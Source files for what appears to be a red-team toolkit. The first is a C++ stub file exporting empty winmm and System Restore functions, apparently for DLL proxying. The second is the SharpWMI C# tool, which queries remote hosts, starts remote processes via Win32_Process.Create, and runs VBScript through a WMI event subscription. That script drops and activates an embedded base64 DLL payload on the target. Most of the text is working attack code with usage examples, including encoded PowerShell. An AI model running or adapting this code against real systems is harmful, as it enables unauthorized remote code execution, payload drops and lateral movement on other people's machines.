extern "C" __declspec(dllexport) void midiInClose()
{}
extern "C" __declspec(dllexport) void midiInGetDevCapsA()
{}
extern "C" __declspec(dllexport) void midiInGetDevCapsW()
{}
extern "C" __declspec(dllexport) void midiInGetErrorTextA()
{}
extern "C" __declspec(dllexport) void midiInGetErrorTextW()
{}
extern "C" __declspec(dllexport) void midiInGetID()
{}
extern "C" __declspec(dllexport) void midiInGetNumDevs()
{}
extern "C" __declspec(dllexport) void midiInMessage()
{}
extern "C" __declspec(dllexport) void midiInOpen()
{}
extern "C" __declspec(dllexport) void midiInPrepareHeader()
{}
extern "C" __declspec(dllexport) void midiInReset()
{}
extern "C" __declspec(dllexport) void midiInStart()
{}
extern "C" __declspec(dllexport) void midiInStop()
{}
extern "C" __declspec(dllexport) void midiInUnprepareHeader()
{}
extern "C" __declspec(dllexport) void midiOutCacheDrumPatches()
{}
extern "C" __declspec(dllexport) void midiOutCachePatches()
{}
extern "C" __declspec(dllexport) void midiOutClose()
{}
extern "C" __declspec(dllexport) void midiOutGetDevCapsA()
{}
extern "C" __declspec(dllexport) void midiOutGetDevCapsW()
{}
extern "C" __declspec(dllexport) void midiOutGetErrorTextA()
{}
extern "C" __declspec(dllexport) void midiOutGetErrorTextW()
{}
extern "C" __declspec(dllexport) void midiOutGetID()
{}
extern "C" __declspec(dllexport) void midiOutGetNumDevs()
{}
extern "C" __declspec(dllexport) void midiOutGetVolume()
{}
extern "C" __declspec(dllexport) void midiOutLongMsg()
{}
extern "C" __declspec(dllexport) void midiOutMessage()
{}
extern "C" __declspec(dllexport) void midiOutOpen()
{}
extern "C" __declspec(dllexport) void midiOutPrepareHeader()
{}
extern "C" __declspec(dllexport) void midiOutReset()
{}
extern "C" __declspec(dllexport) void midiOutSetVolume()
{}
extern "C" __declspec(dllexport) void midiOutShortMsg()
{}
extern "C" __declspec(dllexport) void midiOutUnprepareHeader()
{}
extern "C" __declspec(dllexport) void midiStreamClose()
{}
extern "C" __declspec(dllexport) void midiStreamOpen()
{}
extern "C" __declspec(dllexport) void midiStreamOut()
{}
extern "C" __declspec(dllexport) void midiStreamPause()
{}
extern "C" __declspec(dllexport) void midiStreamPosition()
{}
extern "C" __declspec(dllexport) void midiStreamProperty()
{}
extern "C" __declspec(dllexport) void midiStreamRestart()
{}
extern "C" __declspec(dllexport) void midiStreamStop()
{}
extern "C" __declspec(dllexport) void mixerClose()
{}
extern "C" __declspec(dllexport) void mixerGetControlDetailsA()
{}
extern "C" __declspec(dllexport) void mixerGetControlDetailsW()
{}
extern "C" __declspec(dllexport) void mixerGetDevCapsA()
{}
extern "C" __declspec(dllexport) void mixerGetDevCapsW()
{}
extern "C" __declspec(dllexport) void mixerGetID()
{}
extern "C" __declspec(dllexport) void mixerGetLineControlsA()
{}
extern "C" __declspec(dllexport) void mixerGetLineControlsW()
{}
extern "C" __declspec(dllexport) void mixerGetLineInfoA()
{}
extern "C" __declspec(dllexport) void mixerGetLineInfoW()
{}
extern "C" __declspec(dllexport) void mixerGetNumDevs()
{}
extern "C" __declspec(dllexport) void mixerMessage()
{}
extern "C" __declspec(dllexport) void mixerOpen()
{}
extern "C" __declspec(dllexport) void mixerSetControlDetails()
{}
extern "C" __declspec(dllexport) void mmDrvInstall()
{}
extern "C" __declspec(dllexport) void mmGetCurrentTask()
{}
extern "C" __declspec(dllexport) void mmTaskBlock()
{}
extern "C" __declspec(dllexport) void mmTaskCreate()
{}
extern "C" __declspec(dllexport) void mmTaskSignal()
{}
extern "C" __declspec(dllexport) void mmTaskYield()
{}
extern "C" __declspec(dllexport) void mmioAdvance()
{}
extern "C" __declspec(dllexport) void mmioAscend()
{}
extern "C" __declspec(dllexport) void mmioClose()
{}
extern "C" __declspec(dllexport) void mmioCreateChunk()
{}
extern "C" __declspec(dllexport) void mmioDescend()
{}
extern "C" __declspec(dllexport) void mmioFlush()
{}
extern "C" __declspec(dllexport) void mmioGetInfo()
{}
extern "C" __declspec(dllexport) void mmioInstallIOProcA()
{}
extern "C" __declspec(dllexport) void mmioInstallIOProcW()
{}
extern "C" __declspec(dllexport) void mmioOpenA()
{}
extern "C" __declspec(dllexport) void mmioOpenW()
{}
extern "C" __declspec(dllexport) void mmioRead()
{}
extern "C" __declspec(dllexport) void mmioRenameA()
{}
extern "C" __declspec(dllexport) void mmioRenameW()
{}
extern "C" __declspec(dllexport) void mmioSeek()
{}
extern "C" __declspec(dllexport) void mmioSendMessage()
{}
extern "C" __declspec(dllexport) void mmioSetBuffer()
{}
extern "C" __declspec(dllexport) void mmioSetInfo()
{}
extern "C" __declspec(dllexport) void mmioStringToFOURCCA()
{}
extern "C" __declspec(dllexport) void mmioStringToFOURCCW()
{}
extern "C" __declspec(dllexport) void mmioWrite()
{}
extern "C" __declspec(dllexport) void mmsystemGetVersion()
{}
extern "C" __declspec(dllexport) void mod32Message()
{}
extern "C" __declspec(dllexport) void mxd32Message()
{}
extern "C" __declspec(dllexport) void sndPlaySoundA()
{}
extern "C" __declspec(dllexport) void sndPlaySoundW()
{}
extern "C" __declspec(dllexport) void tid32Message()
{}
extern "C" __declspec(dllexport) void timeBeginPeriod()
{}
extern "C" __declspec(dllexport) void timeEndPeriod()
{}
extern "C" __declspec(dllexport) void timeGetDevCaps()
{}
extern "C" __declspec(dllexport) void timeGetSystemTime()
{}
extern "C" __declspec(dllexport) void timeGetTime()
{}
extern "C" __declspec(dllexport) void timeKillEvent()
{}
extern "C" __declspec(dllexport) void timeSetEvent()
{}
extern "C" __declspec(dllexport) void waveInAddBuffer()
{}
extern "C" __declspec(dllexport) void waveInClose()
{}
extern "C" __declspec(dllexport) void waveInGetDevCapsA()
{}
extern "C" __declspec(dllexport) void waveInGetDevCapsW()
{}
extern "C" __declspec(dllexport) void waveInGetErrorTextA()
{}
extern "C" __declspec(dllexport) void waveInGetErrorTextW()
{}
extern "C" __declspec(dllexport) void waveInGetID()
{}
extern "C" __declspec(dllexport) void waveInGetNumDevs()
{}
extern "C" __declspec(dllexport) void waveInGetPosition()
{}
extern "C" __declspec(dllexport) void waveInMessage()
{}
extern "C" __declspec(dllexport) void waveInOpen()
{}
extern "C" __declspec(dllexport) void waveInPrepareHeader()
{}
extern "C" __declspec(dllexport) void waveInReset()
{}
extern "C" __declspec(dllexport) void waveInStart()
{}
extern "C" __declspec(dllexport) void waveInStop()
{}
extern "C" __declspec(dllexport) void waveInUnprepareHeader()
{}
extern "C" __declspec(dllexport) void waveOutBreakLoop()
{}
extern "C" __declspec(dllexport) void waveOutClose()
{}
extern "C" __declspec(dllexport) void waveOutGetDevCapsA()
{}
extern "C" __declspec(dllexport) void waveOutGetDevCapsW()
{}
extern "C" __declspec(dllexport) void waveOutGetErrorTextA()
{}
extern "C" __declspec(dllexport) void waveOutGetErrorTextW()
{}
extern "C" __declspec(dllexport) void waveOutGetID()
{}
extern "C" __declspec(dllexport) void waveOutGetNumDevs()
{}
extern "C" __declspec(dllexport) void waveOutGetPitch()
{}
extern "C" __declspec(dllexport) void waveOutGetPlaybackRate()
{}
extern "C" __declspec(dllexport) void waveOutGetPosition()
{}
extern "C" __declspec(dllexport) void waveOutGetVolume()
{}
extern "C" __declspec(dllexport) void waveOutMessage()
{}
extern "C" __declspec(dllexport) void waveOutOpen()
{}
extern "C" __declspec(dllexport) void waveOutPause()
{}
extern "C" __declspec(dllexport) void waveOutPrepareHeader()
{}
extern "C" __declspec(dllexport) void waveOutReset()
{}
extern "C" __declspec(dllexport) void waveOutRestart()
{}
extern "C" __declspec(dllexport) void waveOutSetPitch()
{}
extern "C" __declspec(dllexport) void waveOutSetPlaybackRate()
{}
extern "C" __declspec(dllexport) void waveOutSetVolume()
{}
extern "C" __declspec(dllexport) void waveOutUnprepareHeader()
{}
extern "C" __declspec(dllexport) void waveOutWrite()
{}
extern "C" __declspec(dllexport) void wid32Message()
{}
extern "C" __declspec(dllexport) void wod32Message()
{}
// From here on the names are System Restore / Sysprep entry points rather than
// multimedia ones -- presumably a second DLL's export list appended to the
// same stub file (TODO confirm which module these are meant to shadow).
extern "C" __declspec(dllexport) void DisableSR()
{}
extern "C" __declspec(dllexport) void DisableSRInternal()
{}
extern "C" __declspec(dllexport) void EnableSR()
{}
extern "C" __declspec(dllexport) void EnableSREx()
{}
extern "C" __declspec(dllexport) void EnableSRInternal()
{}
extern "C" __declspec(dllexport) void SRNewSystemId()
{}
extern "C" __declspec(dllexport) void SRRemoveRestorePoint()
{}
extern "C" __declspec(dllexport) void SRSetRestorePointA()
{}
extern "C" __declspec(dllexport) void SRSetRestorePointInternal()
{}
extern "C" __declspec(dllexport) void SRSetRestorePointW()
{}
extern "C" __declspec(dllexport) void SetSRStateAfterSetup()
{}
extern "C" __declspec(dllexport) void SysprepCleanup()
{}
extern "C" __declspec(dllexport) void SysprepGeneralize()
{}
--------------------------------------------------------------------------------
/SharpWMI/SharpWMI/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Management;
4 |
5 | namespace SharpWMI
6 | {
7 | class Program
8 | {
// VBScript body stored in the ActiveScriptEventConsumer for action=executevbs.
// This is NOT a String.Format template: FormatVBSPayload() substitutes the
// literal markers {0} (drop file name), {1} (ActCtx class name) and {2} (base64
// of the embedded ScatterBrain resource) with String.Replace.
// At run time the script decodes {2} through Microsoft.XMLDOM, writes the bytes
// to GetSpecialFolder(2) (presumably the temp folder of whatever account runs
// the consumer) and activates class {1} through Microsoft.Windows.ActCtx.
// NOTE(review): `manifest` is the empty string here, so ax.ManifestText is set
// to "" -- the README's WMI section says the weaponized regfree-COM template is
// pasted over this script, so this copy is only a skeleton.
// Replace the VBS below with whatever logic you want to execute for action=executevbs.
public static string vbsPayload = @"
Function decodeBase64(base64)
dim DM, EL
Set DM = CreateObject(""Microsoft.XMLDOM"")
' Create temporary node with Base64 data type
Set EL = DM.createElement(""tmp"")

EL.DataType = ""bin.base64""
' Set encoded String, get bytes
EL.Text = base64
decodeBase64 = EL.NodeTypedValue
End Function

Sub writeBytes(file, bytes)

Dim binaryStream

Const TypeBinary = 1

Const ForReading = 1, ForWriting = 2, ForAppending = 8

Set binaryStream = CreateObject(""ADODB.Stream"")

binaryStream.Type = TypeBinary
'Open the stream and write binary data
binaryStream.Open
binaryStream.Write bytes
'Save binary data to disk

binaryStream.SaveToFile file, ForWriting
End Sub


fileName = ""{0}""
classObj = ""{1}""
manifest = """"
Set SFSO = CreateObject(""Scripting.FileSystemObject"")
dropPath = SFSO.GetSpecialFolder(2)
dynwrapX = ""{2}""


dynwrapXBytes = decodeBase64(dynwrapX)
finalPath = dropPath + ""\"" + fileName
writeBytes finalPath, dynwrapXBytes


Set ax = CreateObject(""Microsoft.Windows.ActCtx"")
ax.ManifestText = manifest

Set DWX = ax.CreateObject(classObj)

";
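// Returns a string of `length` characters drawn from [A-Za-z0-9]; a length of
// zero or less yields the empty string. Used for throwaway file/class names.
// System.Random is not a CSPRNG, so this must not be used where
// unpredictability matters.
// NOTE(review): a fresh time-seeded Random per call can repeat its sequence
// when two calls land in the same tick on older .NET Framework -- TODO confirm
// the target framework if callers depend on the two names differing.
public static string RandomString(int length)
{
    const string alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    if (length <= 0)
    {
        return String.Empty;
    }

    var random = new Random();
    var buffer = new char[length];
    for (int i = 0; i < buffer.Length; i++)
    {
        // Random.Next(maxValue) excludes maxValue, so the bound is alphabet.Length;
        // the previous Length - 1 bound could never select the last character ('9').
        buffer[i] = alphabet[random.Next(alphabet.Length)];
    }

    return new String(buffer);
}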
76 |
// Writes the command-line help (actions, optional credentials, examples) to
// stdout, one Console.WriteLine per entry.
static void Usage()
{
    string[] helpLines =
    {
        "\r\n SharpWMI\r\n",
        " Local system enumeration :\r\n SharpWMI.exe action=query query=\"select * from win32_service\" [namespace=BLAH]",
        " Remote system enumeration :\r\n SharpWMI.exe action=query computername=HOST1[,HOST2,...] query=\"select * from win32_service\" [namespace=BLAH]",
        " Remote process creation :\r\n SharpWMI.exe action=create computername=HOST[,HOST2,...] command=\"C:\\temp\\process.exe [args]\"",
        " Remote VBS execution :\r\n SharpWMI.exe action=executevbs computername=HOST[,HOST2,...] [eventname=blah]\r\n",
        " Note: Any remote function also takes an optional \"username=DOMAIN\\user\" \"password=Password123!\"\r\n",
        "\r\n Examples:\r\n",
        " SharpWMI.exe action=query query=\"select * from win32_process\"",
        " SharpWMI.exe action=query query=\"SELECT * FROM AntiVirusProduct\" namespace=\"root\\SecurityCenter2\"",
        " SharpWMI.exe action=query computername=primary.testlab.local query=\"select * from win32_service\"",
        " SharpWMI.exe action=query computername=primary,secondary query=\"select * from win32_process\"",
        " SharpWMI.exe action=create computername=primary.testlab.local command=\"powershell.exe -enc ZQBj...\"",
        " SharpWMI.exe action=executevbs computername=primary.testlab.local",
        " SharpWMI.exe action=executevbs computername=primary.testlab.local username=\"TESTLAB\\harmj0y\" password=\"Password123!\"",
    };

    foreach (string line in helpLines)
    {
        Console.WriteLine(line);
    }
}
95 |
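// Splits `text` into consecutive pieces of at most `partLength` characters;
// the last piece carries the remainder. Used to wrap long property values
// for display. Validation happens lazily (iterator method): a null text
// raises ArgumentNullException and partLength < 1 raises ArgumentException
// when the sequence is first enumerated.
public static System.Collections.Generic.IEnumerable<string> Split(string text, int partLength)
{
    if (text == null) { throw new ArgumentNullException("text"); }

    if (partLength < 1) { throw new ArgumentException("'partLength' must be greater than 0."); }

    // A text that already fits (including the empty string) is yielded exactly
    // once. The previous version yielded it twice: once from its partCount < 2
    // shortcut and again from the loop that followed it.
    if (text.Length <= partLength)
    {
        yield return text;
        yield break;
    }

    for (int index = 0; index < text.Length; index += partLength)
    {
        int lengthLeft = Math.Min(partLength, text.Length - index);
        yield return text.Substring(index, lengthLeft);
    }
}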
117 |
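// Runs a WQL query on the local machine and prints every property of every
// result as "name : value". An empty or null wmiNameSpace leaves the searcher
// on its default namespace (System.Management's default -- presumably
// root\cimv2, TODO confirm). Property values longer than 90 characters are
// wrapped into 80-character lines. Failures are printed to stdout, not thrown.
static void LocalWMIQuery(string wmiQuery, string wmiNameSpace = "")
{
    try
    {
        // Both the searcher and its result collection are IDisposable (they
        // wrap COM enumerators); the previous version never released them.
        using (ManagementObjectSearcher searcher = String.IsNullOrEmpty(wmiNameSpace)
            ? new ManagementObjectSearcher(wmiQuery)
            : new ManagementObjectSearcher(wmiNameSpace, wmiQuery))
        using (ManagementObjectCollection results = searcher.Get())
        {
            Console.WriteLine();

            foreach (ManagementObject result in results)
            {
                foreach (PropertyData prop in result.Properties)
                {
                    PrintProperty(prop);
                }
                Console.WriteLine();
            }
        }
    }
    catch (Exception ex)
    {
        Console.WriteLine(String.Format(" Exception : {0}", ex.Message));
    }
}

// Prints one property as "{name,30} : {value}". Values longer than 90
// characters are split into 80-character lines; continuation lines carry a
// blank 30-column name field so the value column stays aligned.
private static void PrintProperty(PropertyData prop)
{
    string propValue = String.Format("{0}", prop.Value);

    if (String.IsNullOrEmpty(propValue) || propValue.Length <= 90)
    {
        Console.WriteLine(String.Format("{0,30} : {1}", prop.Name, prop.Value));
        return;
    }

    bool first = true;
    foreach (string line in Split(propValue, 80))
    {
        Console.WriteLine(first
            ? String.Format("{0,30} : {1}", prop.Name, line)
            : String.Format("{0,30} {1}", "", line));
        first = false;
    }
}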
173 |
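// Runs a WQL query against `host` over WMI/DCOM and prints every property of
// every result as "name : value". An empty or null wmiNameSpace defaults to
// root\cimv2. When username is given, username/password are placed in the
// ConnectionOptions (only the username is echoed). Failures are printed to
// stdout, not thrown.
static void RemoteWMIQuery(string host, string wmiQuery, string wmiNameSpace, string username, string password)
{
    // Treat null like "" so a missing namespace cannot yield a malformed
    // "\\host\" scope path (the previous version only tested == "").
    if (String.IsNullOrEmpty(wmiNameSpace))
    {
        wmiNameSpace = "root\\cimv2";
    }

    ConnectionOptions options = new ConnectionOptions();

    Console.WriteLine("\r\n Scope: \\\\{0}\\{1}", host, wmiNameSpace);

    if (!String.IsNullOrEmpty(username))
    {
        Console.WriteLine(" User credentials: {0}", username);
        options.Username = username;
        options.Password = password; // deliberately never printed
    }
    Console.WriteLine();

    ManagementScope scope = new ManagementScope(String.Format("\\\\{0}\\{1}", host, wmiNameSpace), options);

    try
    {
        scope.Connect();

        // Searcher and result collection wrap COM enumerators; dispose them
        // instead of leaving them to the finalizer as before.
        using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, new ObjectQuery(wmiQuery)))
        using (ManagementObjectCollection results = searcher.Get())
        {
            Console.WriteLine();

            foreach (ManagementObject result in results)
            {
                foreach (PropertyData prop in result.Properties)
                {
                    Console.WriteLine(String.Format("{0,30} : {1}", prop.Name, prop.Value));
                }
                Console.WriteLine();
            }
        }
    }
    catch (Exception ex)
    {
        Console.WriteLine(String.Format(" Exception : {0}", ex.Message));
    }
}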
220 |
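// Starts `command` on `host` through Win32_Process.Create in root\cimv2 and
// prints the method's return value and the new process id. When username is
// given, username/password go into the ConnectionOptions (only the username
// is echoed). The command line is passed through unmodified -- it is the
// operator's own input, not quoted or escaped here. Failures are printed to
// stdout, not thrown.
static void RemoteWMIExecute(string host, string command, string username, string password)
{
    const string wmiNameSpace = "root\\cimv2";

    ConnectionOptions options = new ConnectionOptions();

    Console.WriteLine("\r\n Host : {0}", host);
    Console.WriteLine(" Command : {0}", command);

    if (!String.IsNullOrEmpty(username))
    {
        Console.WriteLine(" User credentials : {0}", username);
        options.Username = username;
        options.Password = password; // deliberately never printed
    }
    Console.WriteLine();

    ManagementScope scope = new ManagementScope(String.Format("\\\\{0}\\{1}", host, wmiNameSpace), options);

    try
    {
        scope.Connect();

        // The class object and both parameter objects wrap COM objects; the
        // previous version never disposed them (and kept an unused copy of
        // inParams.Properties).
        using (ManagementClass processClass = new ManagementClass(scope, new ManagementPath("Win32_Process"), new ObjectGetOptions()))
        using (ManagementBaseObject inParams = processClass.GetMethodParameters("Create"))
        {
            inParams["CommandLine"] = command;

            using (ManagementBaseObject outParams = processClass.InvokeMethod("Create", inParams, null))
            {
                Console.WriteLine(" Creation of process returned : {0}", outParams["returnValue"]);
                Console.WriteLine(" Process ID : {0}\r\n", outParams["processId"]);
            }
        }
    }
    catch (Exception ex)
    {
        Console.WriteLine(String.Format(" Exception : {0}", ex.Message));
    }
}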
261 |
// Builds the VBScript stored in the event consumer from the vbsPayload
// template: a random drop file name (3-11 chars plus a 3-char extension), a
// random ActCtx class name (6-9 chars) and the base64 of the embedded
// ScatterBrain resource replace the {0}, {1} and {2} markers. The drop name is
// echoed; the C:\Windows\Temp prefix in that message is an assumption about
// where GetSpecialFolder(2) resolves for the consumer's account -- the script
// itself does not fix the directory.
static string FormatVBSPayload()
{
    Random rng = new Random();

    string dropName = RandomString(rng.Next(3, 12)) + "." + RandomString(3);
    string classId = RandomString(rng.Next(6, 10));
    string dllBase64 = Convert.ToBase64String((byte[])SharpWMI.Properties.Resources.ScatterBrain);

    Console.WriteLine("[*] VBS Payload Filename on Remote System: C:\\Windows\\Temp\\{0}", dropName);

    string script = vbsPayload
        .Replace("{0}", dropName)
        .Replace("{1}", classId)
        .Replace("{2}", dllBase64);

    return script;
}
275 |
// Runs the VBS built by FormatVBSPayload() on `host` through a permanent WMI
// event subscription: an __IntervalTimerInstruction with TimerId "Timer"
// (root\cimv2) fires every 30 s, an __EventFilter named `eventName` selects
// that timer's __TimerEvent, and an ActiveScriptEventConsumer (also named
// `eventName`) runs the script once the __FilterToConsumerBinding joins them.
// After a 45 s wait all four objects are deleted again. username/password,
// when given, go into the ConnectionOptions (only the username is echoed).
// NOTE(review): Put() failures for the filter, consumer and binding are only
// logged, so the later steps still run against objects that may not exist;
// and the cleanup block is reached only when nothing throws -- an unexpected
// exception lands in the outer catch below and leaves whatever was already
// created on the remote host. The timer id and consumer/filter names are the
// persistent artifacts a defender would look for.
static void RemoteWMIExecuteVBS(string host, string eventName, string username, string password)
{
    try
    {
        ConnectionOptions options = new ConnectionOptions();
        if (!String.IsNullOrEmpty(username))
        {
            Console.WriteLine("[*] User credentials: {0}", username);
            options.Username = username;
            options.Password = password;
        }
        Console.WriteLine();

        // first create a 30 second timer on the remote host
        // (IntervalBetweenEvents is in milliseconds; the TimerId is the fixed string "Timer")
        ManagementScope timerScope = new ManagementScope(string.Format(@"\\{0}\root\cimv2", host), options);
        ManagementClass timerClass = new ManagementClass(timerScope, new ManagementPath("__IntervalTimerInstruction"), null);
        ManagementObject myTimer = timerClass.CreateInstance();
        myTimer["IntervalBetweenEvents"] = (UInt32)30000;
        myTimer["SkipIfPassed"] = false;
        myTimer["TimerId"] = "Timer";
        try
        {
            Console.WriteLine("[*] Creating 'Timer' object on {0}", host);
            myTimer.Put();
        }
        catch (Exception ex)
        {
            // Only this failure aborts; nothing has been created yet.
            Console.WriteLine("[X] Exception in creating timer object: {0}", ex.Message);
            return;
        }

        // Filter, consumer and binding all live in root\subscription.
        ManagementScope scope = new ManagementScope(string.Format(@"\\{0}\root\subscription", host), options);

        // then install the __EventFilter for the timer object
        ManagementClass wmiEventFilter = new ManagementClass(scope, new ManagementPath("__EventFilter"), null);
        WqlEventQuery myEventQuery = new WqlEventQuery(@"SELECT * FROM __TimerEvent WHERE TimerID = 'Timer'");
        ManagementObject myEventFilter = wmiEventFilter.CreateInstance();
        myEventFilter["Name"] = eventName;
        myEventFilter["Query"] = myEventQuery.QueryString;
        myEventFilter["QueryLanguage"] = myEventQuery.QueryLanguage;
        myEventFilter["EventNameSpace"] = @"\root\cimv2";
        try
        {
            Console.WriteLine("[*] Setting '{0}' event filter on {1}", eventName, host);
            myEventFilter.Put();
        }
        catch (Exception ex)
        {
            // Logged but not fatal: the consumer and binding are still attempted.
            Console.WriteLine("[X] Exception in setting event filter: {0}", ex.Message);
        }


        // now create the ActiveScriptEventConsumer payload (VBS)
        // ScriptText runs inside the remote WMI scripting host when the filter
        // fires; KillTimeout (seconds) bounds how long the script may run.
        ManagementObject myEventConsumer = new ManagementClass(scope, new ManagementPath("ActiveScriptEventConsumer"), null).CreateInstance();

        myEventConsumer["Name"] = eventName;
        myEventConsumer["ScriptingEngine"] = "VBScript";
        myEventConsumer["ScriptText"] = FormatVBSPayload();
        myEventConsumer["KillTimeout"] = (UInt32)45;

        try
        {
            Console.WriteLine("[*] Setting '{0}' event consumer on {1}", eventName, host);
            myEventConsumer.Put();
        }
        catch (Exception ex)
        {
            // Logged but not fatal, as above.
            Console.WriteLine("[X] Exception in setting event consumer: {0}", ex.Message);
        }


        // finally bind them together with a __FilterToConsumerBinding
        // (RelativePath is only meaningful after the Put() calls above succeeded)
        ManagementObject myBinder = new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), null).CreateInstance();

        myBinder["Filter"] = myEventFilter.Path.RelativePath;
        myBinder["Consumer"] = myEventConsumer.Path.RelativePath;

        try
        {
            Console.WriteLine("[*] Binding '{0}' event filter and consumer on {1}", eventName, host);
            myBinder.Put();
        }
        catch (Exception ex)
        {
            Console.WriteLine("[X] Exception in setting FilterToConsumerBinding: {0}", ex.Message);
        }


        // wait for everything to trigger
        // (45 s gives the 30 s timer one chance to fire before the objects are removed)
        Console.WriteLine("\r\n[*] Waiting 45 seconds for event to trigger on {0} ...\r\n", host);
        System.Threading.Thread.Sleep(45 * 1000);


        // finally, cleanup
        // Each deletion is attempted independently so one failure does not
        // stop the others; none of this runs if an exception escaped above.
        try
        {
            Console.WriteLine("[*] Removing 'Timer' internal timer from {0}", host);
            myTimer.Delete();
        }
        catch (Exception ex)
        {
            Console.WriteLine("[X] Exception in removing 'Timer' interval timer: {0}", ex.Message);
        }

        try
        {
            Console.WriteLine("[*] Removing FilterToConsumerBinding from {0}", host);
            myBinder.Delete();
        }
        catch (Exception ex)
        {
            Console.WriteLine("[X] Exception in removing FilterToConsumerBinding: {0}", ex.Message);
        }

        try
        {
            Console.WriteLine("[*] Removing '{0}' event filter from {1}", eventName, host);
            myEventFilter.Delete();
        }
        catch (Exception ex)
        {
            Console.WriteLine("[X] Exception in removing event filter: {0}", ex.Message);
        }

        try
        {
            // NOTE(review): the format string uses {0} twice, so the host is
            // printed as eventName; the second placeholder should be {1}.
            Console.WriteLine("[*] Removing '{0}' event consumer from {0}\r\n", eventName, host);
            myEventConsumer.Delete();
        }
        catch (Exception ex)
        {
            Console.WriteLine("[X] Exception in removing event consumer: {0}", ex.Message);
        }
    }
    catch (Exception ex)
    {
        // Anything not handled above ends here -- with no cleanup of objects
        // that were already Put() on the remote host.
        Console.WriteLine(String.Format(" Exception : {0}", ex.Message));
        Console.WriteLine(ex);
    }
}
416 |
/// <summary>
/// Entry point. Parses <c>key=value</c> arguments, validates the
/// combinations each action requires, and dispatches to the query,
/// create or executevbs handler. Any missing or inconsistent argument
/// prints usage and returns.
/// </summary>
/// <param name="args">Command-line arguments, each of the form key=value.</param>
static void Main(string[] args)
{
    // No action can be expressed in fewer than two arguments.
    if (args.Length < 2)
    {
        Usage();
        return;
    }

    // Split every argument on its first '='. Arguments without an '='
    // (or with an empty key) are ignored; a repeated key keeps the last value.
    var arguments = new Dictionary<string, string>();
    foreach (string argument in args)
    {
        int separator = argument.IndexOf('=');
        if (separator <= 0)
        {
            continue;
        }
        arguments[argument.Substring(0, separator)] = argument.Substring(separator + 1);
    }

    // username and password are accepted only as a pair. NOTE: both are
    // read from the process command line, so they are visible to process
    // listings and command-line auditing on the host that runs this tool.
    bool hasUsername = arguments.ContainsKey("username");
    bool hasPassword = arguments.ContainsKey("password");
    if (hasUsername != hasPassword)
    {
        Usage();
        return;
    }

    string username = "";
    string password = "";
    if (hasUsername)
    {
        username = arguments["username"];
        password = arguments["password"];
    }

    string action;
    if (!arguments.TryGetValue("action", out action))
    {
        Usage();
        return;
    }

    switch (action)
    {
        case "query":
        {
            string query;
            if (!arguments.TryGetValue("query", out query))
            {
                Usage();
                return;
            }

            string wmiNamespace;
            bool hasNamespace = arguments.TryGetValue("namespace", out wmiNamespace);

            string targets;
            if (arguments.TryGetValue("computername", out targets))
            {
                // Remote query: one call per comma-separated host name.
                foreach (string computerName in targets.Split(','))
                {
                    RemoteWMIQuery(computerName, query, hasNamespace ? wmiNamespace : "", username, password);
                }
            }
            else if (hasNamespace)
            {
                // Local query against an explicit namespace.
                LocalWMIQuery(query, wmiNamespace);
            }
            else
            {
                // Local query against the handler's default namespace.
                LocalWMIQuery(query);
            }
            break;
        }

        case "create":
        {
            string targets;
            string command;
            if (!arguments.TryGetValue("computername", out targets)
                || !arguments.TryGetValue("command", out command))
            {
                Usage();
                return;
            }
            foreach (string computerName in targets.Split(','))
            {
                RemoteWMIExecute(computerName, command, username, password);
            }
            break;
        }

        case "executevbs":
        {
            string targets;
            if (!arguments.TryGetValue("computername", out targets))
            {
                Usage();
                return;
            }

            // The event name defaults to "Debug" unless eventname= is supplied.
            string eventName;
            if (!arguments.TryGetValue("eventname", out eventName))
            {
                eventName = "Debug";
            }

            foreach (string computerName in targets.Split(','))
            {
                RemoteWMIExecuteVBS(computerName, eventName, username, password);
            }
            break;
        }

        default:
            Usage();
            break;
    }
}
546 | }
547 | }
548 |
--------------------------------------------------------------------------------